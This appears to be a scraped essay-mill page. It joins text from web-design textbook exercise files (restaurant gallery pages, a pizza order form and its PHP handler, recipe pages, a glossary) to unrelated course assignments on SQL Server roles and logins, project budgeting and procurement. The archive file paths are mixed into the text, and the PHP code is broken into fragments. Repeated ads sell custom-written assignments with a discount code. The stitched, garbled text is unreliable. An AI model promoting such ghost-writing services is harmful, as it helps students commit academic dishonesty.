Our Baked Goods

close-up of sliced rustic bread We start our day at the crack of dawn to bake our own muffins, bread, and dinner rolls. Loaves not used that day are donated to the local food shelter.

Our Burgers

juicy burgers on a cutting board People come from all over to enjoy our lovingly made burgers. We grind our own locally-sourced organic beef and turkey so you know it’s fresh and free from fillers and other nonsense. Go for one of our creative topping combos or stick with the classics.

Catch of the Day

baked fish with potatoes and cherry tomatoes Our chef works with local fisherman to pick the freshest the sea has to offer for our daily seafood special. Our Roast Cod Caponata with Roasted Potatoes is an old favorite with our regulars.

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/._index.html

LWD5e_materials/ch07/finished exercises/gallery/.DS_Store

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/._.DS_Store

LWD5e_materials/ch07/finished exercises/gallery/bread.html

Gallery: Baked Goods

close-up of sliced rustic bread

[Back to Gallery]

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/._bread.html

LWD5e_materials/ch07/finished exercises/gallery/fish.html

Gallery: Catch of the Day

baked fish on roasted potatoes with cherry tomatoes

[Back to Gallery]

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/._fish.html

LWD5e_materials/ch07/finished exercises/gallery/photos/.DS_Store

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/photos/._.DS_Store

LWD5e_materials/ch07/finished exercises/gallery/photos/tabouleh-800.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/photos/._tabouleh-800.jpg

LWD5e_materials/ch07/finished exercises/gallery/photos/fish-800.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/photos/._fish-800.jpg

LWD5e_materials/ch07/finished exercises/gallery/photos/burgers-800.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/photos/._burgers-800.jpg

LWD5e_materials/ch07/finished exercises/gallery/photos/fries-800.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/photos/._fries-800.jpg

LWD5e_materials/ch07/finished exercises/gallery/photos/bread-800.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/photos/._bread-800.jpg

LWD5e_materials/ch07/finished exercises/gallery/photos/chicken-800.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/photos/._chicken-800.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/._photos

LWD5e_materials/ch07/finished exercises/gallery/burgers.html

Gallery: The Best Burgers

juicy burgers topped with bacon on a cutting board

[Back to Gallery]

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/._burgers.html

LWD5e_materials/ch07/finished exercises/gallery/thumbnails/bread-200.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/thumbnails/._bread-200.jpg

LWD5e_materials/ch07/finished exercises/gallery/thumbnails/.DS_Store

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/thumbnails/._.DS_Store

LWD5e_materials/ch07/finished exercises/gallery/thumbnails/chicken-200.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/thumbnails/._chicken-200.jpg

LWD5e_materials/ch07/finished exercises/gallery/thumbnails/burgers-200.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/thumbnails/._burgers-200.jpg

LWD5e_materials/ch07/finished exercises/gallery/thumbnails/fries-200.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/thumbnails/._fries-200.jpg

LWD5e_materials/ch07/finished exercises/gallery/thumbnails/tabouleh-200.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/thumbnails/._tabouleh-200.jpg

LWD5e_materials/ch07/finished exercises/gallery/thumbnails/fish-200.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/thumbnails/._fish-200.jpg

__MACOSX/LWD5e_materials/ch07/finished exercises/gallery/._thumbnails

__MACOSX/LWD5e_materials/ch07/finished exercises/._gallery

__MACOSX/LWD5e_materials/ch07/._finished exercises

__MACOSX/LWD5e_materials/._ch07

LWD5e_materials/ch09/.DS_Store

__MACOSX/LWD5e_materials/ch09/._.DS_Store

LWD5e_materials/ch09/finished exercise/.DS_Store

__MACOSX/LWD5e_materials/ch09/finished exercise/._.DS_Store

LWD5e_materials/ch09/finished exercise/pizza_final.html

Blackstone Bistro | Pizza-on-Demand

Our 12″ wood-fired pizzas are avaiable for delivery. Build your custom pizza and we’ll deliver it within an hour.

Your Information

  • Name:
  • Address:
  • Telephone Number:
  • Email:
  • Delivery instructions:

Design your dream pizza:

Pizza specs Crust (Choose one):

  • Classic white
  • Multigrain
  • Cheese-stuffed crust
  • Gluten-free

Toppings (Choose as many as you want)

  • Red sauce
  • White sauce
  • Mozzarella Cheese
  • Pepperoni
  • Mushrooms
  • Peppers
  • Anchovies

NumberHow many pizzas: 1 2 3 4 5 6

 

__MACOSX/LWD5e_materials/ch09/finished exercise/._pizza_final.html

LWD5e_materials/ch09/finished exercise/pizza.php

empty’; } else { $toppings_problem = FALSE; $toppings = isset($_POST[‘toppings’]) ? implode(‘, ‘, $_POST[‘toppings’]) : ’empty’; } ?>

THANK YOU

Thank you for ordering from Black Goose Bistro. We have received the following information about your order:

Your Information

  • Name: empty’; ?>
  • Address: empty’; ?>
  • Telephone number: empty’; ?>
  • Email Address: empty’; ?>

Delivery instructions: empty’; ?>

Your pizza

Sorry, we did not receive your information. Try again.

  • Crust: empty’; ?>
  • Toppings: *
  • Number: empty’; ?>

 

This site is for educational purposes only. No pizzas will show up at your door.

__MACOSX/LWD5e_materials/ch09/finished exercise/._pizza.php

__MACOSX/LWD5e_materials/ch09/._finished exercise

LWD5e_materials/ch09/pizza.html

Blackstone Bistro | Pizza-on-Demand

Our 12″ wood-fired pizzas are available for delivery. Build your custom pizza and we’ll deliver it within an hour.

Your Information

  • Name:
  • Address:
  • Telephone Number:
  • Email:
  • Delivery instructions:

Design Your Dream Pizza:

Pizza specs

 

Crust (Choose one):

  • Classic white
  • Multigrain
  • Cheese-stuffed crust
  • Gluten-free

Toppings (Choose as many as you want):

  • Red sauce
  • White sauce
  • Mozzarella Cheese
  • Pepperoni
  • Mushrooms
  • Peppers
  • Anchovies

Number

How many pizzas:

 

__MACOSX/LWD5e_materials/ch09/._pizza.html

__MACOSX/LWD5e_materials/._ch09

LWD5e_materials/ch08/CH08_exercises_finished.html

Exercise 8-1

Album Year
Rubber Soul 1965
Revolver 1966
Sgt. Pepper’s 1967
The White Album 1968
Abbey Road 1969

Exercise 8-2

7:00pm 7:30pm 8:00pm
The Sunday Night Movie
Perry Mason Candid Camera What’s My Line
Bonanza The Wackiest Ship in the Army

Exercise 8-3

apples oranges pears
bananas pineapple
lychees

Exercise 8-4

Your Content Here

A common header for two subheads Header 3
Header 1 Header 2
Thing A data A1 data A2 data A3
Thing B data B1 data B2 data B3
Thing C data C1 data C2 data C3

__MACOSX/LWD5e_materials/ch08/._CH08_exercises_finished.html

__MACOSX/LWD5e_materials/._ch08

LWD5e_materials/ch06/.DS_Store

__MACOSX/LWD5e_materials/ch06/._.DS_Store

LWD5e_materials/ch06/Exercise 6-1 to 6-7/.DS_Store

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/._.DS_Store

LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/index.html

Jen's Kitchen banner

Welcome to Jen’s Kitchen

People who know me know that I love to cook. I’ve created this site to share some of my favorite recipes and online food resources. Bon Appetit!

About the site

From Jen’s Cookbook

  • Tapenade (Olive Spread)
  • Garlic Salmon
  • Linguine with Clam Sauce
  • Couscous with Peas and Mint

Good Food on the Web

  • The Food Network
  • Epicurious

Copyright 2018, Jennifer Robbins

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/._index.html

LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/.DS_Store

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/._.DS_Store

LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/about.html

About Jen’s Kitchen

The recipes listed here are ones that I have developed myself. In some cases, I started with a recipe found in a cookbook or magazine, but over time, I’ve adapted it enough to call it my own. Bon Appetit!

The site also includes links to my favorite online cooking resources. One day, I hope to include a section of restaurant reviews.

If you have recommendations, feel free to email me at jen@example.com.

Back to the home page

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/._about.html

LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/images/jenskitchen.gif

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/images/._jenskitchen.gif

LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/images/spoon.gif

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/images/._spoon.gif

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/._images

LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/recipes/.DS_Store

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/recipes/._.DS_Store

LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/recipes/tapenade.html

Tapenade (Olive Spread)

This is a really simple dish to prepare and it’s always a big hit at parties. My father recommends:

“Make this the night before so that the flavors have time to blend. Just bring it up to room temperature before you serve it. In the winter, try serving it warm.”

Ingredients

  • 1 8oz. jar sundried tomatoes
  • 2 large garlic cloves
  • 2/3 c. kalamata olives
  • 1 t. capers

Instructions

  1. Combine tomatoes and garlic in a food processor. Blend until as smooth as possible.
  2. Add capers and olives. Pulse the motor a few times until they are incorporated, but still retain some texture.
  3. Serve on thin toast rounds with goat cheese and fresh basil garnish (optional).

[Back to the home page]

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/recipes/._tapenade.html

LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/recipes/pasta/linguine.html

Linguine with Clam Sauce

I don’t know how authentic this recipe is, but it’s quick and delicious. You can make it lactose-free by substituting a dairy-free margarine (we like Earth’s Balance) for the butter. (Unfortunately, butter is better.) This recipe serves 2.

  • 2 cans chopped clams (tuna-sized cans)
  • 1/2 head of garlic, chopped fine
  • 1 shallot, chopped fine
  • 2-3 T. butter (or margarine)
  • 1/2-3/4 c. dry white wine (like Sauvignon Blanc)
  • 1/2 lb. linguine
  1. Get the water boiling for the linguine. Generously salt the water so the pasta has flavor of its own.
  2. Open the cans of clams and use the lid to squeeze out the liquid into a 2-cup measuring cup. Set the clams aside You usually get about 1 1/2 cups of liquid. Add wine to the liquid until you have a total of 2 cups liquid.
  3. In a high-sided, large skillet, saute the shallot in 2 T. butter until translucent. Add the garlic (the more the better) and saute until fragrant, but not brown (just under a minute).
  4. Add the clam juice and wine to the shallots and garlic. Turn the heat to medium high until the mixture boils. Continue boiling until the liquid has reduced by half.
  5. Turn down the heat and add the reserved clams. At roughly the same time, add the pasta to the water and cook until al dente. About 9 minutes later, the pasta should be done and the clams will be warmed through.
  6. Taste the clam sauce and add salt and pepper to taste. If you’re using butter, add one last tablespoon or two to bind the sauce (if you’re using margarine, don’t bother).

[Back to the home page]

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/recipes/pasta/._linguine.html

LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/recipes/pasta/couscous.html

Couscous Salad with Peas and Mint

This is barely a “recipe” since I just threw it together and didn’t pay much attention to measurements. But it turned out to be pretty tasty, so I thought I’d share. It’s not the kind of thing where exact measurements are that crucial anyway, so use your best judgment and personal taste.

  • 1 package couscous
  • 1 can chicken broth (or water or veggie broth if you’re vegetarian)
  • 1 to 1 1/2 cups fresh peas, shelled
  • 3-4 scallions, sliced thin
  • 1/4 cup toasted pine nuts
  • about 1/2 cup fresh mint, chopped (it’s gotta be fresh, not dried)
  • juice of 1 lemon
  • approx. 1/4 cup olive oil (or to taste)
  • 1 t. salt
  • fresh ground pepper to taste
  1. Make whole box of couscous according to the directions, only use chicken broth instead of water. A typical can of broth will be just short of the amount of liquid it calls for on the box, so top it off with water. It will be done in 6 or 7 minutes. Allow to cool (putting it in the fridge speeds it up).
  2. Meanwhile, toss the shelled fresh peas into a pot of boiling water and cook them about 3 minutes, until bright green and tender, but not mushy. Test after 2 minutes to make sure they’re not overcooked. Rinse in cold water and allow to cool.
  3. Slice the scallions, chop the mint, toast the pinenuts, and prepare any other veggies you want to toss in there.
  4. Make the dressing in a small bowl by whisking together the juice of a lemon, the salt, pepper, and enough olive oil to properly balance the acidity of the lemon juice. It will take approximately 1/4 cup of olive oil, maybe a little more. Remember that this dressing has to flavor many cups of bland and absorbant couscous, so make sure you have enough and make sure the flavor is bold (don’t be afraid of the salt… it will get spread out).
  5. When the couscous is cool, toss in the peas, mint, veggies and coat with the dressing. It can be served right away or saved until the next day.

[Back to the home page]

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/recipes/pasta/._couscous.html

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/recipes/._pasta

LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/recipes/salmon.html

Garlic Salmon

This is one of my favorite recipes for when folks come over for dinner. I’ve already shared this popular recipe with many of my friends. The best thing is it’s so easy to make!

  • 1/4 c. dry sherry
  • 2 T. soy sauce
  • 2 T. vegetable oil
  • 2 t. dry mustard
  • 3-4 T. freshly minced garlic
  • 1 to 2 lbs salmon filets
  1. Mix together first 5 ingredients in a shallow dish. Place the cleaned and de-boned salmon filets face down in the mixture and allow to marinate for 1/2 to 1 hour. (Tip, I cut a large piece of salmon into the serving sizes before marinating so the marinade can coat the sides of each piece as well.)
  2. Preheat the broiler. Transfer filets to a baking sheet, skin-down. Broil the salmon on the top rack for 7 to 9 minutes, or until done to your liking (I like it still pink in the center).
  3. I usually serve this with an aromatic rice and a lightly seasoned stir fry.

[Back to the home page]

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/recipes/._salmon.html

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/jenskitchen/._recipes

__MACOSX/LWD5e_materials/ch06/Exercise 6-1 to 6-7/._jenskitchen

__MACOSX/LWD5e_materials/ch06/._Exercise 6-1 to 6-7

LWD5e_materials/ch06/Test Yourself/.DS_Store

__MACOSX/LWD5e_materials/ch06/Test Yourself/._.DS_Store

LWD5e_materials/ch06/Test Yourself/somesite/tutorial.html

This is the tutorial page

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/._tutorial.html

LWD5e_materials/ch06/Test Yourself/somesite/index.html

HOME PAGE

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/._index.html

LWD5e_materials/ch06/Test Yourself/somesite/.DS_Store

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/._.DS_Store

LWD5e_materials/ch06/Test Yourself/somesite/images/bullet.gif

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/images/._bullet.gif

LWD5e_materials/ch06/Test Yourself/somesite/images/arrow.gif

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/images/._arrow.gif

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/._images

LWD5e_materials/ch06/Test Yourself/somesite/examples/places/usa.html

USA page

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/examples/places/._usa.html

LWD5e_materials/ch06/Test Yourself/somesite/examples/places/canada.html

Canada page

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/examples/places/._canada.html

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/examples/._places

LWD5e_materials/ch06/Test Yourself/somesite/examples/intro.html

Introduction

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/examples/._intro.html

LWD5e_materials/ch06/Test Yourself/somesite/examples/instructions.html

Instructions

 

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/examples/._instructions.html

LWD5e_materials/ch06/Test Yourself/somesite/examples/people/family.html

Family page

 

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/examples/people/._family.html

LWD5e_materials/ch06/Test Yourself/somesite/examples/people/friends.html

Friends page

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/examples/people/._friends.html

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/examples/._people

LWD5e_materials/ch06/Test Yourself/somesite/examples/things/acorn.html

Acorn page

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/examples/things/._acorn.html

LWD5e_materials/ch06/Test Yourself/somesite/examples/things/coatrack.html

Coat rack page

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/examples/things/._coatrack.html

LWD5e_materials/ch06/Test Yourself/somesite/examples/things/boot.html

Boot page

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/examples/things/._boot.html

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/examples/._things

__MACOSX/LWD5e_materials/ch06/Test Yourself/somesite/._examples

__MACOSX/LWD5e_materials/ch06/Test Yourself/._somesite

__MACOSX/LWD5e_materials/ch06/._Test Yourself

LWD5e_materials/ch06/Exercise 6-8/.DS_Store

__MACOSX/LWD5e_materials/ch06/Exercise 6-8/._.DS_Store

LWD5e_materials/ch06/Exercise 6-8/glossary.html

Glossary

A | B | C | D | E | F | G | H | I | J | L | M | N | O | P | Q | R | S | T | U | V | W | X

A

aliasing
The jagged stair-stepped edges that can appear between colors in a bitmapped graphic.
anchor
The HTML element responsible for making hyperlinks.
applet
A self-contained, mini-executable program, such as one written in the Java programming language.
attribute
Parameters that extend or modify an HTML element

B

backend
Aspects of a web site that pertain to functions that take place on the server
bit depth
A measurement of colors based on the number of bits alloted by the file or system
browser
The client software that requests and displays web pages.

C

cache
Temporary storage area that browsers use for downloaded documents
CGI
Common Gateway Interface, a mechanism for communication between the web server and other programs running on the server
codec
An algorithm used by media files for compressing and decompressing data
compression
A method for reducing the file size of a document. Different file formats use different compression techniques

D

dithering
The approximation of a color by mixing pixels of similar colors that are available in the image or system palette.
Document Type Definition (DTD)
An XML document that defines every element and attribute for a markup language.
domain name
A name that corresponds to a specific IP address.

E

extranet
A web site or system that is available within a closed system and to select users outside that system, usually via a password.

F

Flash
A multimedia format for the delivery of animation, interactivity, and audio on the Web
frame rate
In video and animation, the number of frames per second
FTP
File Transfer Protocol; a system for moving files over the Internet from one computer to another

G

gamma
Refers to the overall brightness of a computer’s monitor display.
GIF
Graphic Interchange Format; common file format of web graphic images. GIF is a palette-based, 8-bit format.

H

hexadecimal
A base-16 numbering system that uses the characters 0-9 and A-F. It is used in CSS and HTML for specifying color values
host
Another term for the server. Hosting services are companies that provide server space for web sites.
HTML
HyperText Markup Language; the tagging language used to identify the structure of web documents.
HTTP
Hypertext Transfer Protocol; the system that defines how web pages and media are requested and transferred between servers and browsers.

I

imagemap
A single image that contains multiple hypertext links
IP address
A numeric identifier for a computer or device on a network.
ISP
Internet Service Provider; a company that sells access to the Internet computer network

J

Java
A cross-platform, object-oriented programming language developed by Sun Microsystems.
JavaScript
A scripting language that adds behaviors to elements on web pages and browsers.

L

lossy
A type of compression in which data is thrown out to reduce file size. The JPEG format uses a lossy compression scheme.

M

MP3
A popuplar file format for high-quality audio that uses MPEG compression
MPEG
A family of multimedia standards created by the Motion Picture Experts Group

N

nesting
Placing one HTML element within another. HTML and XHTML define rules for what elements may be nested within another.

O

optimizing
Reducing file size to improve transfer time over the network.

P

palette
A table in an 8-bit indexed color file that provides color information for the pixels in the image.
pathname
Directions to a file using a nomenclature in which directory hierarchies and filenames are separated by slashes
pixel
A single square in a bitmapped graphic image
PNG
Portable Network Graphic; a graphic file format that features support for 8-bit and 24 bit images

Q

QuickTime
An audio and video format developed by Apple Computer and available for all platforms

R

resolution
The number of pixels per inch (ppi) in a bitmapped image or computer monitor
RGB color
A color system that describes color based on combinations of red, green, and blue light
root directory
The top-level directory for a web site. The root directory contains all the files and subdirectories for a site.

S

sans-serif font
A font design featuring straight or squared off character strokes. Helvetica is an example.
serif font
A font that has horizontal slabs at the ends of character strokes. Times is an example

T

tweening
A function in animation tools for automatically creating frames between a start and end frame.

U

Unix
A multi-user, multi-tasking operating system developed by Bell Laboratories.
URL
Universal Resource Locator; the address of a document or resource on the World Wide Web

V

vector image
A graphic that uses mathematical equations to define shapes and fills. Vector images can be resized without change in quality.

W

W3C
The World Wide Web Consortium; a consortium of companies and organizations that develops common standards for the development of the Web.
web palette
A set of 216 colors that is available on both Mac and Windows machines running 8-bit color monitors.

X

XHTML
The new HTML standard that has been written according to the rules of XML.
XML
eXtensible Markup Language; a metalanguage for creating custom markup languages

__MACOSX/LWD5e_materials/ch06/Exercise 6-8/._glossary.html

__MACOSX/LWD5e_materials/ch06/._Exercise 6-8

LWD5e_materials/ch06/finished exercises/.DS_Store

__MACOSX/LWD5e_materials/ch06/finished exercises/._.DS_Store

LWD5e_materials/ch06/finished exercises/jenskitchen/index.html

Jen's Kitchen banner

Welcome to Jen’s Kitchen

People who know me know that I love to cook. I’ve created this site to share some of my favorite recipes and online food resources. Bon Appetit!

About the site

From Jen’s Cookbook

Good Food on the Web

Copyright 2016, Jennifer Robbins

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Computer Science homework help

Computer Science homework help

Lab Assignment 8

Exercise

1. Write a script that creates a user-defined database role named OrderEntry in the MyGuitarShop database. Give INSERT and UPDATE permission to the new role for the Orders and OrderItems table. Give SELECT permission for all user tables.

Write a script that (1) creates a login ID named “RobertHalliday” with the password “HelloBob”; (2) sets the default database for the login to the MyGuitarShop database; (3) creates a user named “RobertHalliday” for the login; and (4) assigns the user to the OrderEntry role you created in exercise 1.

Write a script that uses dynamic SQL and a cursor to loop through each row of the Administrators table and (1) create a login ID for each row in that consists of the administrator’s first and last name with no space between; (2) set a temporary password of “temp” for each login; (3) set the default database for the login to the MyGuitarShop database; (4) create a user for the login with the same name as the login; and (4) assign the user to the OrderEntry role you created in exercise 1.

Using the Management Studio, create a login ID named “RBrautigan” with the password “RBra9999,” and set the default database to the MyGuitarShop database. Then, grant the login ID access to the MyGuitarShop database, create a user for the login ID named “RBrautigan”, and assign the user to the OrderEntry role you created in exercise 1.

Note: If you get an error that says “The MUST_CHANGE option is not supported”, you can deselect the “Enforce password policy” option for the login ID.

Write a script that removes the user-defined database role named OrderEntry. (Hint: This script should begin by removing all users from this role.)

Write a script that (1) creates a schema named Admin, (2) transfers the table named Addresses from the dbo schema to the Admin schema, (3) assigns the Admin schema as the default schema for the user named RobertHalliday that you created in exercise 2, and (4) grants all standard privileges except for REFERENCES and ALTER to RobertHalliday for the Admin schema.

 

 

 

Oregon Tech J. Dickson

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Budget Estimating Assignment

Budget Estimating Assignment

This assignment consists of 2 parts: questions about budget estimation and developing a budget.

Part 1 Questions (10 points)

Provide responses to the following questions

1.    You are providing a review of contractor bids for a component of your upcoming project.  What can be done to determine whether or not a vendor’s bid is reasonable?

2.    Describe the conditions for which parametric, analogous and bottom up estimation techniques work best, and provide 2 examples in support of each method.

3.    Why is a cost management plan important?  How does the plan benefit the project manager?

Part 2 Budget Estimating (30 points)

Using the same scenario from the previous unit on scheduling, create a time-phased budget for the following project.  Prepare a figure like Exhibit 10.9, CPT 4e, that illustrates the daily and cumulative costs for the resource-leveled project.

Assume the following hourly rates:

Alcides $45 / hr.

Joan $50 / hr.

Part 3 Budget Estimating (50 points)

You are the project manager for a process improvement project for Company XYZ.    Prepare a figure like Exhibit 10.9 that illustrates the weekly and cumulative costs for the resource-leveled project.

Hint: To accomplish this exercise, you’ll need to create a project schedule in MS Excel (or by hand), create resource assignments, assign costs to each resource, and assign the resources to each task.  Some resource leveling will be required.

In this project, you have 3 employees: Ann, Becky and Clive.  Each person is limited to the amount of time allocated to your project.  Ann and Becky are available 30 hours/week; Clive is available 20 hours/week.  There hourly rates are: Ann: $60/hour; Becky: $35/hour; and Clive: $50/hour.

Mechanics (10 points)

Part 1 responses should be presented in a question-response format.  Use Arial font with 11 point. There is no word limit.

Your Instructor will use Turn-it-in to ensure your paper is authentic work.  To avoid plagiarism, see the course home page for more information and use the Purdue Online Writing Lab to learn how to paraphrase, summarize and cite the references you use in all academic writing assignments.

Parts 2 and 3 Use MS Excel (MS Project is not acceptable) to create the budget estimate and present it similar to Exhibit 10.9.  Show intermediate steps (schedule, resource schedule assignments, resource-leveled schedule and any other elements needed to create the time-phased budget estimate.

It is expected that each part of this assignment have excellent mechanics (presentation, grammar and spelling) and exhibit the quality of work capable of a group of graduate students and working professionals. All sections of the document submitted must be readable at 100% magnification.

Your Instructor will use Turn-it-in to ensure your paper is authentic work.  To avoid plagiarism, see the course home page for more information and use the Purdue Online Writing Lab to learn how to paraphrase, summarize and cite the references you use in all academic writing assignments.

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Project Supply Chain/Procurement Management

Project Supply Chain/Procurement Management

Complete Exercise questions 1 through 4 found at the end of Chapter 13, CPM 4e.

You must select a project that is available online or in print from a news source within 6 months prior to the due date for this assignment.  Provide an active link or an image of the source (including date) as evidence and place it as an appendix to your responses to the exercise questions.

Use a question-response format for this assignment.

Provide in-text citation of all references.

Use APA writing style.

Turn-it-In will be used to screen this assignment for authenticity.

Point allocation will be as follows:

Source of project provided and within 6 months prior to the due date for the assignment – PASS/FAIL screen for the assignment.

Question 1 –  20 points (ensure that you develop a complete list of as many potential contracted items as possible)

Question 2 –  20 points (ensure that you properly cite the reference used to baseline or template your RFI).

Question 3 –  20 points (ensure that your ideas are tailored to the project)

Question 4 –  20 points (ensure that you explain why the chosen contract is used AND why others were rejected)

Mechanics (20 points)  It is expected that this assignment has excellent mechanics (presentation, grammar and spelling) and exhibits the quality of work capable of a group of graduate students and working professionals.  All sections of the document submitted must be readable at 100% magnification.  Include any resources used in an APA formatted reference section.

Your Instructor will use Turn-it-in to ensure your paper is authentic work.  To avoid plagiarism, see the course home page for more information and use the Purdue Online Writing Lab to learn how to paraphrase, summarize and cite the references you use in all academic writing assignments.

Submit your assignment to the drop box in Moodle

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!